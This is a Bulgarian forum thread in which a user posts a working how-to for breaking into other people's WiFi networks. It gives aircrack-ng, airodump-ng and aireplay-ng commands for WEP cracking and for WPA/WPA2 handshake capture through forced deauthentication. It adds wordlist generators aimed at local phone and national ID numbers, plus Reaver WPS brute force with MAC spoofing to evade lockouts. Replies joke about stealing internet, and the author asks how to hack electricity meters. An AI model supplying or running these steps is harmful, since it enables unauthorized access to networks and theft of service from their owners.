Справочници, схемотехника, теория > Компютри, мрежи, freeware софтуер, операционни системи и др.
Разбиване на WiFi мрежи.
(1/1)
Радeв:
Какво е необходимо:
Kali Linux - идва с подходящо компилирано ядро, при другите дистрибуции има проблеми.
WiFi адаптер, който може да влиза в мониторен режим.
Насочена антена. Аз използвам такова /само че с 722n/: https://bigdanzblog.wordpress.com/2014/02/01/cantenna-can-do/
Има и готови скриптове, но те не са особенно приложими, такъв е #wifite. Аз го използвам само за анализ.
WEP
Най-лесни за разбиване бяха WEP мрежите, но уви вече почти не се срещат ...
--- Цитат ---#airodump-ng -c 1 --bssid 64:70:02:BB:E1:BA -w cap_file mon0
#aircrack-ng -b MAC_AP FILE*
--- Край на цитат ---
Когато няма клиенти:
--- Цитат ---#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 mon0
--- Край на цитат ---
WPA/WPA2
1. Вкарване на WiFi адаптера във мониторен режим:
--- Цитат ---airmon-ng start wlan1
--- Край на цитат ---
2. Aнализирате мрежитe и избирате една. Да насочите антената и чак тогава да преминете към разбиване на мрежата. Аз използвам #wifite за това, след като съм избрал мрежа: #airodump-ng -c 1 mon0.
3. Пускане на запис
--- Цитат ---#airodump-ng -c 1 --bssid 64:70:02:BB:E1:BA -w cap_file mon0
--- Край на цитат ---
4. Пускане на фалшива деауторизация.
--- Цитат ---#aireplay-ng -0 1 -a MAC_AP -c MAC_CL mon0
--- Край на цитат ---
Гледайте предния прозорец в горния десен ъгъл, трябва да се появи "WPA handshake", това означава че се ауторизационните пакети са прихванати, CTRL+C и преминаваме към разбиване.
WPA/WPA2 Мрежите са трудни за разбиване от криптографска гледна точка, За да се разбие ключа е необходимо да се използва голяма изчислителна мошност - GPU на видеокартите се справя с тази задача:
http://blog.codinghorror.com/speed-hashing/
http://phreaklets.blogspot.bg/2013/06/cracking-wpa2-psk-passwords-with.html
Но често паролите са телефонни номера и ЕГН-та.
Ето един Perl генератор, който върши добра работа: ftp://ftp.mut.ac.th/pub/Security/wg.pl
GSM:
--- Цитат ---perl ./wg.pl -а 08 -l 8 -u 8 -v 9876543210 | aircrack-ng -e linksys -w - psk-01.cap
--- Край на цитат ---
BTK:
--- Цитат ---perl ./wg.pl -a 052 -l 6 -u 6 -v 0123456789 | aircrack-ng -e linksys -w - psk-01.cap
--- Край на цитат ---
Всички числа 8–10 цифрени.
--- Цитат ---perl ./wg.pl -l 8 -u 10 -v 0123456789 | aircrack-ng -e linksys -w - psk-01.cap
--- Край на цитат ---
WPS
Най-популярната атака е WPS Brute Force - налучкване на двата 4 цифрени пина. След успех на атаката получаваме passphrase.
При включен WPS, рутерите бяха лесна жертва /TP-Link рутерите нямаха никаква защита/, но вече почти всички имат защита и след няколко проби на пинове, имат голям таймаут или блокират адреса на адаптера с който атакуваме. Има модифицирана версия на Reaver, която променя мак адреса при всяка атака:
https://github.com/gabrielrcouto/reaver-wps
--- Цитат ---#reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
--- Край на цитат ---
az_skeleta:
А такаааа, като не можахме да измислим СЕ, да се научим да крадем поне интернет.
Браво!!!
Радeв:
Просто исках да споделя есенцията, която бях нахвърлял преди време.
Работим и по СЕ, тихо, бавно и скромно. Aко имам резултат, вие ще се първите които ще разберете и получите проекта за мултипликиране.
Моя интернет е отключен, но малко съм намалил мощността, тъкмо да не облъчва.
Сега някой да сподели как да хакнем електромерите. Метода на Петко Ганчев с УВЧ практически не е удобен.
Гледам имат IR комуникация. Някой ден ще закача IR адаптера на лаптопа и ще отида пред електромера да видя какво става.
Навигация
[0] Списък на темите
Премини на пълна версия